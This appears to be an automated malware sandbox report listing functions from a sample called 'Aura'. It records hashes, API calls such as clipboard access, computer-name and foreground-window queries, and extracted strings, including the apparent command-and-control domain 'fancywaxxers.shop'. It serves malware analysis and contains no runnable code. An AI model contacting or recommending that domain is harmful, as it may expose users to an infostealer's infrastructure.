Instruction Fuzzy Hash: 08B136326046119BEB18DF28C85177FB7E2EFC5314F19853EE8858B292DB78D9058786

Function 004430A0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00446210,00000002,00000018,?,?,00000018,?,?,?), ref: 004430CE

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00441890 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

A'&, xrefs: 00441A46

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: A'&
API String ID: 0-4149055815
Opcode ID: 48f152f945660339330345f74640ee76e7244b9cef64ebe2b8c3d20476ddb764
Instruction ID: 4d5524db58cee23812c5a5abbe93a4b0fea27a0289297e824947b0c752fcb1a6
Opcode Fuzzy Hash: 48f152f945660339330345f74640ee76e7244b9cef64ebe2b8c3d20476ddb764
Instruction Fuzzy Hash: 20515C756083049BE724EF28C840B27B7D1EB81314F14863DE495AB3E2E679DC45878A

Function 004451A0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

@, xrefs: 00445207

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: ee18e7d188278afebbeaa417062c2340502b0240cc1503bb00af95fd85de606c
Instruction ID: 2d672177de33417d2963ab061c36899a728af73172786a322acf78b0435c5ceb
Opcode Fuzzy Hash: ee18e7d188278afebbeaa417062c2340502b0240cc1503bb00af95fd85de606c
Instruction Fuzzy Hash: BC210471504304ABD714DF08D8C166BB7F4FF86324F10962EE968473A1D379E909CB9A

Function 0040CB88 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6d2cc8dc9244d77327b74df8fe4fe509c86cd67e9a7efa21151f86f2b5bdd9
Instruction ID: 40ed7fba01e0c2b7f9de71274c63e8f006297c70945069efdbc0d089f5741009
Opcode Fuzzy Hash: fe6d2cc8dc9244d77327b74df8fe4fe509c86cd67e9a7efa21151f86f2b5bdd9
Instruction Fuzzy Hash: F65102756483408BE328CF54C89174BBBE2BFD1314F198A2DD6949B3D1C3BA98098B86

Function 00421E30 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5405ffb0b4ffff0f3bff5baef9c404b25dd4628ff6f83f5706c1f8e61e36a52
Instruction ID: 2e1ebfe9778e59d181a208e53db9da6fa399cbcadca7229ee0f09a77ca703906
Opcode Fuzzy Hash: b5405ffb0b4ffff0f3bff5baef9c404b25dd4628ff6f83f5706c1f8e61e36a52
Instruction Fuzzy Hash: 2E31C1616183118BD7249F28DC6266BB7F4EF92364F45591DE491CB3A0F33CC944C7AA

Function 00430414 Relevance: 3.1, APIs: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00430448
GetComputerNameExA.KERNELBASE(00000006,BA595575,00000100), ref: 004305E0

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 2a9dff30a6b7cdb51adab1274f24edb6780728a7c33397eb37bdd0bdf3aac62e
Instruction ID: 9b330a79bbd5bb0ab534dcac68e6cfbf08fb4b6ac3c6064b0e8a0b796ee915bf
Opcode Fuzzy Hash: 2a9dff30a6b7cdb51adab1274f24edb6780728a7c33397eb37bdd0bdf3aac62e
Instruction Fuzzy Hash: 8F41E676B592409BE328CF29CD637EFBAD29BD9314F09D52ED099C7241CA7C88018B42

Function 00438990 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004389D2
GetSystemMetrics.USER32 ref: 004389E2

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 0ab793dca44b04de626b84b1109e1c1bdc08c66c1e0576f10689b158d60e0c09
Instruction ID: 43110972b07af657be9ed27b448580a85db164e70326eca2924eecf181d85a4a
Opcode Fuzzy Hash: 0ab793dca44b04de626b84b1109e1c1bdc08c66c1e0576f10689b158d60e0c09
Instruction Fuzzy Hash: 3C915EB090D7C88AE374DF14C4997CFBAE0BB95308F60891ED68D5B251C7B9444ACF8A

Function 0040D186 Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040D18A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D2D5

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d28ff8a41eac799c754c92be15804b52cb4e4d9b0804a2afeb6f71e7dde1ca92
Instruction ID: 313725e9993fd5c9b5e1582151964c344024a2e5f498ba5db132b6da5ae3f9fc
Opcode Fuzzy Hash: d28ff8a41eac799c754c92be15804b52cb4e4d9b0804a2afeb6f71e7dde1ca92
Instruction Fuzzy Hash: 4941B8B4C10B40ABD370BF3D9A0B7137EB4AB05214F404B1DF9E68A6D5E630A4298BD7

Function 004303D0 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,BA595575,00000100), ref: 004305E0

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 2f40f71df3601ef2995e0f81a2852c8b24789b86ae41d80ead7db67959c26c5a
Instruction ID: 2afc2dbf5b31e52d3583647ff72e4e61991e451def5a26d7aad4dd71ff6d4b8a
Opcode Fuzzy Hash: 2f40f71df3601ef2995e0f81a2852c8b24789b86ae41d80ead7db67959c26c5a
Instruction Fuzzy Hash: B041D676A592409BE328CF25CD637EBBAD29BD9314F09D42ED499C7345CA7C88018B42

Function 00443198 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0044320E

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 936c3c68a3ffb2ef4ddd570284187180925c6f71a1bd407d1e0df078374e850e
Instruction ID: 24ac5b46e6a5b2e041618c58bd79b8cfb41ffcb9e6c4e9f1df2d48238ea5c14d
Opcode Fuzzy Hash: 936c3c68a3ffb2ef4ddd570284187180925c6f71a1bd407d1e0df078374e850e
Instruction Fuzzy Hash: C901F4B1E002288BEB14CF65EC4C39A3BA1FB12305F1444BAC209D7290DA798E468F08

Function 00443040 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,0043F16F,05FCA318,00004000,05FCA318,0043F16F,00000000,00004000,?,?,?,?,?,?,01697328), ref: 00443072

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0223e42589b04226d31206ad414e01377aebc3f0381122e9d6c873c4e08e5aa4
Instruction ID: 2ad807fda027fe5d2a0609277bc4873e3da47b49a71df0b12e60ffe4c50caaba
Opcode Fuzzy Hash: 0223e42589b04226d31206ad414e01377aebc3f0381122e9d6c873c4e08e5aa4
Instruction Fuzzy Hash: AEE09B36514311ABD2106F357C09B177664FFC6765F06047AF40566125DB39F801C5AE

Function 00441850 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,004151F3,02035CE7,004151F3,02035CE7), ref: 0044186E

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 639a252233e5d906e2ef5c32aacf4a64819be2553a7e317c24faf70e92e03466
Instruction ID: 6405a19f23c4a79ea544cb8e902ba6a2204d2c2dd25047a57b2438375a878c41
Opcode Fuzzy Hash: 639a252233e5d906e2ef5c32aacf4a64819be2553a7e317c24faf70e92e03466
Instruction Fuzzy Hash: 8CD0C731409521DFCA143F15FC05B963A59FF4B351F4704B1B4045B175C774DC51D698

Function 0043D480 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043D4AD

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 8f305d1bf8c35ee2042288d58bbe639ba22d7276a9d6f283cf2d3140bbc4b632
Instruction ID: 2b1399f7511086adb9604d39e168e15ae409828038104983c102990a01ecea58
Opcode Fuzzy Hash: 8f305d1bf8c35ee2042288d58bbe639ba22d7276a9d6f283cf2d3140bbc4b632
Instruction Fuzzy Hash: 4DF0E578A046008FD714EF68E991BA973E0EB5E350F00045ED941C7391DB3DAD80CB05

Function 00437687 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004376CD

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 3ded0c6b1bdf922f6f7272cf32aedbe58f83cb0f3b56d19c247d93868935fbb6
Instruction ID: dceba17f66b3c19821051d69bfcc0c8752f75945c5fa6b766bfd20d80ff5ceb7
Opcode Fuzzy Hash: 3ded0c6b1bdf922f6f7272cf32aedbe58f83cb0f3b56d19c247d93868935fbb6
Instruction Fuzzy Hash: F8F06DB45087018FD314DF25D5A8716BBF1FF85344F11891CE4958B390CBB5A949DF82

Function 0040D313 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D325

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4d0d1c953049bffc05b2f7582811e205a6b5ac635d54b2705bfaf964f74cb565
Instruction ID: 834bd6c09c029b2334ec71372d720fb92184d920a4353d44cfaa601c8a0be18b
Opcode Fuzzy Hash: 4d0d1c953049bffc05b2f7582811e205a6b5ac635d54b2705bfaf964f74cb565
Instruction Fuzzy Hash: 9BE05E383D634077F3288714AC13F1562028346B20F34432CB312FE7D4C8E47401450D

Function 00434CC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434D06

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: fa9c49543e244c87066040a25fd55ec598614d73b2670f4037cc669c39a92557
Instruction ID: 027a635f93d30ce5737e457df53f514f0f47a5aadb9532ba693f0ac65bd83f25
Opcode Fuzzy Hash: fa9c49543e244c87066040a25fd55ec598614d73b2670f4037cc669c39a92557
Instruction Fuzzy Hash: 89F045B45197018FE310DF29D5A871BBBF0FB85344F00991CE4958B290D7B5AA49CF82

Function 00443200 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0044320E

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 424cbfd775808baf4c9f6c0c534e4e6aaee6afdc9b96c1dd65d9fb172cf0d9aa
Instruction ID: b024236da2366b946284f06994e2b0851ece647b9dec49c0c81bd80099df00f8
Opcode Fuzzy Hash: 424cbfd775808baf4c9f6c0c534e4e6aaee6afdc9b96c1dd65d9fb172cf0d9aa
Instruction Fuzzy Hash: E2E017F9A002509FDB04CF65FC859253BA4FB4A349704083AE603C3262DA35E92ADF18

Function 00441830 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00408B3F,F4F796F9), ref: 00441840

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69ff71b5f9d17014f42b11559ace012b97cefc8bcab106be1ef8fcdf08811b49
Instruction ID: d6c77c47f61b321a9d326d5ab5b3fa90306764736ece2ed7df980186b50150fd
Opcode Fuzzy Hash: 69ff71b5f9d17014f42b11559ace012b97cefc8bcab106be1ef8fcdf08811b49
Instruction Fuzzy Hash: D8C09B31045120ABD5102F55FC05FC63F54DF45361F020065B00467071C764BCC1C6DC

Non-executed Functions

Function 0042B9B0 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 808COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042BA5C
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042BAEC

Strings

8H?N, xrefs: 0042BB27
|R8, xrefs: 0042BB5F
+LMR, xrefs: 0042BB2F
^, xrefs: 0042C35D
0D"J, xrefs: 0042BB1F

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +LMR$0D"J$8H?N$^$|R8
API String ID: 237503144-458914156
Opcode ID: 79909fbac30fb5e66acbd904ea0cbd95bba07625093b370a2509dd65e7f1cc92
Instruction ID: c7c85477f66e9fd13227fa7ebba66d06f09a096f49153567da8ec0e3e75818bd
Opcode Fuzzy Hash: 79909fbac30fb5e66acbd904ea0cbd95bba07625093b370a2509dd65e7f1cc92
Instruction Fuzzy Hash: 104212B1A08350CFD724CF24D89176BBBE0FF86308F44892DE5959B391D7799909CB8A

Function 004387A0 Relevance: 9.2, APIs: 6, Instructions: 154clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004387C2
GetClipboardData.USER32 ref: 004387E3
CloseClipboard.USER32 ref: 00438971

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: d5623ef5750349a5e779fb9a3821a78c07c7824c0f16cf86fcde8614aec816ff
Instruction ID: a823a00c787e9bab5434c8fa7797b155274f23b6a97a51de1e87133d218b3d41
Opcode Fuzzy Hash: d5623ef5750349a5e779fb9a3821a78c07c7824c0f16cf86fcde8614aec816ff
Instruction Fuzzy Hash: 765117B19087828FC710AB7CD54539EFFA0AF16320F14866EE4D597382D7389915C7A7

Function 0040E949 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040E950

Strings

IK, xrefs: 0040EBD3
")*+, xrefs: 0040EC0B
fancywaxxers.shop, xrefs: 0040ECB3
ETWn, xrefs: 0040EA54

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: Uninitialize
String ID: ")*+$ETWn$fancywaxxers.shop$IK
API String ID: 3861434553-2898764957
Opcode ID: c47fcba39186aacd8300c8ef85de990aad1032fe3f35ab1a601919a3ffd46e24
Instruction ID: accb82a54e20fa92fb73cefbcd80a34400653674d38e94695b995c43e2cad46c
Opcode Fuzzy Hash: c47fcba39186aacd8300c8ef85de990aad1032fe3f35ab1a601919a3ffd46e24
Instruction Fuzzy Hash: 9AA1C3B0244B819FD325CF26C490752BFB1FF56314F188A5DC4D61BB86C73AA82ACB95

Function 004229B0 Relevance: 6.7, Strings: 5, Instructions: 449COMMON

Download Yara Rule

Strings

{, xrefs: 00422DF1
KHINV`SJ, xrefs: 00422B0B
C@A<, xrefs: 00422A6A
V`SJ, xrefs: 00422B07
uvw, xrefs: 00422A01

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: {$C@A<$KHINV`SJ$V`SJ$uvw
API String ID: 0-2621688370
Opcode ID: ef1d74290ed3a5477cb5b192ad26b8cd6083c1dcc33f38c5859b7782832f11c4
Instruction ID: 5a760f86b8610966ecd9e3c32ec0cf573155cd635e7360c8f56d399f643ada62
Opcode Fuzzy Hash: ef1d74290ed3a5477cb5b192ad26b8cd6083c1dcc33f38c5859b7782832f11c4
Instruction Fuzzy Hash: 53D1DBB06083509FD714DF68D891B6BBBE1FF81318F54892DE8858B391E7B8D809CB56

Function 004193B3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004196E3

Strings

B, xrefs: 004195F2
/x.~, xrefs: 004193E5

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: /x.~$B
API String ID: 237503144-3205792687
Opcode ID: 16f84120e836ca8a033dc4c62be8767f03dcdba5fd31ebe3bf09ee8aa03a712f
Instruction ID: e592015ee3d618db574388a5ce9cc9c501a02a62b4631909ad0ee89f236b5ae4
Opcode Fuzzy Hash: 16f84120e836ca8a033dc4c62be8767f03dcdba5fd31ebe3bf09ee8aa03a712f
Instruction Fuzzy Hash: FBB1BEB16007018FC724CF29C4A5762B7F2FF99304B1985ADC5868F765E779E882CB54

Function 0042AD9C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042AEA2
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042AF16

Strings

JH, xrefs: 0042AE35

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: JH
API String ID: 237503144-881485498
Opcode ID: 8fba95e39ae6ec8cbffd2f5994036b0dc60183d4ebc78c6c898791d4f2018a69
Instruction ID: edc789bdd8ee5fc0acb0389e058c74a2a35961fe41ec481e5d295f78642225be
Opcode Fuzzy Hash: 8fba95e39ae6ec8cbffd2f5994036b0dc60183d4ebc78c6c898791d4f2018a69
Instruction Fuzzy Hash: 4F7122B4A01624CFDB20CFA4E88275FB7B1FB49310F19453DE906AB391D735A802CB89

Function 00421272 Relevance: 4.8, Strings: 3, Instructions: 1004COMMON

Download Yara Rule

Strings

ga, xrefs: 004217F3
y{, xrefs: 0042190E
C\], xrefs: 00421832

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: C\]$ga$y{
API String ID: 0-3368342930
Opcode ID: cd2341ec037577bc99bc420aeff35f18296d3b7522ae6c3fe5dd5a97b430a371
Instruction ID: 46de01637c9aa05c6197a779f4d1c8d0afe55d3160af1974f1322ad9084e2ace
Opcode Fuzzy Hash: cd2341ec037577bc99bc420aeff35f18296d3b7522ae6c3fe5dd5a97b430a371
Instruction Fuzzy Hash: 7D5249B6A102228BDB24CF25CC923A7B7B2FFA5340F59916DC8459F354E738A841CBD4

Function 00441ED0 Relevance: 4.3, Strings: 3, Instructions: 556COMMON

Download Yara Rule

Strings

f, xrefs: 00442191
S"(w, xrefs: 00442229
S"(w, xrefs: 00442010

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: daf685e1766f99e8124046fcbd765eb392b2f124da52f652d71b12816b6133b1
Instruction ID: aeb98fc91a9b78443770639516cd1db4ebd6e67150380eb6192c60d771872a17
Opcode Fuzzy Hash: daf685e1766f99e8124046fcbd765eb392b2f124da52f652d71b12816b6133b1
Instruction Fuzzy Hash: B112F1316083519FE324CF28C99072BBBE1BB89314F54862EF9944B3A1D7B9DD45CB86

Function 00418849 Relevance: 4.1, APIs: 2, Instructions: 1064COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1190d3628aa454985977a7364d74b562eb707d7f03db00d2ec055fe681146c83
Instruction ID: e7ff62f8d0705ca03d9ab523ea4df68b7195cdca502b1d5d85aeecd1209dfb6a
Opcode Fuzzy Hash: 1190d3628aa454985977a7364d74b562eb707d7f03db00d2ec055fe681146c83
Instruction Fuzzy Hash: 7772BC742007018FD724CF29C8A1B63B7E2FF5A314F18856ED4968B7A2D778E846CB55

Function 00414C80 Relevance: 3.5, Strings: 2, Instructions: 987COMMON

Download Yara Rule

Strings

#L, xrefs: 00414D37
NP,?, xrefs: 00415190

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: #L$NP,?
API String ID: 0-3083008129
Opcode ID: 31e4dc55f1e470c604e2d91c963ab77abfb4e7389a28deb69edb9a295c6d27d1
Instruction ID: 330d528ae7f4c5d01464460e82753c63c1e70db8a229943083b4c109234ec64d
Opcode Fuzzy Hash: 31e4dc55f1e470c604e2d91c963ab77abfb4e7389a28deb69edb9a295c6d27d1
Instruction Fuzzy Hash: 6B524375648300DBD3149F24EC427AB73A2EFC6328F24863DF895872E1EB789955C74A

Function 0042FF7C Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

V, xrefs: 0042FF87
,R, xrefs: 0043004A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

